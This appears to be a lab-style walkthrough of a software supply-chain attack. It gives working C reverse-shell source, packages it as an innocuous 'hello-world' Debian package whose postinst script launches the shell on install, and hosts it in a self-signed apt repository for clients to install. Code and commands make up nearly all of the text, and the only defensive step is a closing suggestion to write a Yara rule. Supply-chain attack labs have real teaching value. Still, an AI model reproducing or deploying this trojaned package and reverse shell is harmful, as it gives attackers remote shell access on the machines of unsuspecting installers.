- Generate Debian Package Using Docker:
- Create a C application that prints “Hello World” reverse shell.
- Write a Dockerfile that builds this application and packages it into a
.debfile usingdpkg-deb.
- Serve the Debian Package with a Docker Image:
- Create a second Dockerfile to set up an
nginxserver. - Configure nginx to serve the
.debfile created in the previous step. - Build nginx reprepo docker image and run it, serving the package available over HTTP.
- Create a second Dockerfile to set up an
- Connect and Install the Package Using Docker:
- Write a Dockerfile for a new client container that will install the package.
- Use the
--linkDocker command to connect this client container to thenginxserver container. - Execute commands within the client container to add the repository and install the Debian package using
apt-get.
Table of Contents
Rev Shell (hello.c)
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "xxx.xxx.xxx.xxx"
#define REMOTE_PORT 22
int main(int argc, char *argv[])
{
struct sockaddr_in sa;
int s;
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
sa.sin_port = htons(REMOTE_PORT);
s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *)&sa, sizeof(sa));
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
execve("/bin/sh", 0, 0);
return 0;
}Dockerfile
# Use the Debian image as the base
FROM debian:latest
# Install build and packaging tools
RUN apt-get update && apt-get install -y \
build-essential \
dpkg-dev \
fakeroot
# Set the working directory in the container
WORKDIR /build
# Copy the C source file into the container
COPY hello.c /build
# Compile the program
RUN gcc -o hello hello.c
# Prepare the Debian package structure
RUN mkdir -p /build/package1/DEBIAN /build/package1/usr/local/bin
RUN echo "Package: hello-world\nVersion: 1.0\nSection: base\nPriority: optional\nArchitecture: all\nMaintainer: Mike Jones <who.am@i.com>\nDescription: A simple network application" > /build/package1/DEBIAN/control
# Create postinst script
RUN echo '#!/bin/sh\n/usr/local/bin/hello' > /build/package1/DEBIAN/postinst
RUN chmod 755 /build/package1/DEBIAN/postinst
# Move the binary to the package directory
RUN mv hello /build/package1/usr/local/bin/
# Build the Debian package
CMD dpkg-deb --build /build/package1 /tmpBuild Deb Package and Install with DPKG
$ docker build -t hello-world-builder:0.1 .
# Build package on host mount volume /tmp
$ docker run --rm -v /tmp:/tmp hello-world-builder:0.1
# Test dpkg by installing package locally for testing
$ docker run --rm -v /tmp:/tmp hello-world-builder:0.1 /bin/sh -c 'dpkg -i /tmp/hello-world_1.0_all.deb'
Serving Deb Package with Apt Repository
To wrap up our supply chain example, we are going to create a debian package repo with reprepro and host the package with nginx. GPG will be used to self sign the package.
Example will be run on Docker:
- Create gpg key and export for signing
gpg --gen-key(folow prompts)- gpg –list-secret-keys
- Export Public key
- gpg –export -a “08F997633EDB55830EC87CC7073F5EE1ECBFDEDF” > public.key
- Export Private Key
- gpg –export-secret-key -a ECBFDEDF > private.key
- Create the
distributionsfile forreprepro
$ cat > distributions <<EOF
Origin: MyName
Label: MyRepo
Codename: stable
Architectures: i386 amd64 source
Components: main
Description: My personal repository
SignWith: ECBFDEDF (Your GPG key)
EOFDockerfile Build
# Use a Debian base image
FROM debian:buster
# Install nginx and reprepro
RUN apt-get update && \
apt-get install -y nginx reprepro && \
rm -rf /var/lib/apt/lists/* && \
apt-get clean
# Set up directories for reprepro
RUN mkdir -p /var/www/html/debian/conf /var/www/html/debian/db /var/www/html/debian/dists /var/www/html/debian/pool
# Configuration for reprepro
COPY distributions /var/www/html/debian/conf
# Copy Public Key
COPY public.key /var/www/html/public.key
# Copy your .deb package into the pool directory
COPY hello-world_1.0_all.deb /var/www/html/debian/pool
# Copy gpg keys
COPY private.key /tmp/private.key
RUN gpg --import /tmp/private.key
# Configure nginx to serve the repository
RUN echo "server { listen 80; server_name localhost; location / { root /var/www/html; autoindex on; } }" > /etc/nginx/sites-available/default
# Initialize the repository
RUN reprepro -b /var/www/html/debian includedeb stable /var/www/html/debian/pool/hello-world_1.0_all.deb
# Start nginx in the foreground
CMD ["nginx", "-g", "daemon off;"]Build Repo Image
$ docker build -t apt-repo:0.1 -f Dockerfile-apt .Connect Client and Install Package
# Start Package Server
$ docker run --name apt-repo -d -p 80:80 apt-repo:0.1
# Install package
$ docker run --link apt-repo:apt-repo --rm hello-world-builder:0.1 /bin/sh -c 'apt-get -y install curl && curl -O http://apt-repo:80/public.key && apt-key add public.key && echo "deb [trusted=yes] http://apt-repo/debian/ stable main" | tee -a /etc/apt/sources.list && apt-get update \
&& apt-get install hello-world'
Labs and Next Steps
- Create a Yara rule to scan for outbound string and detect that Indicator of Compromise (IOC)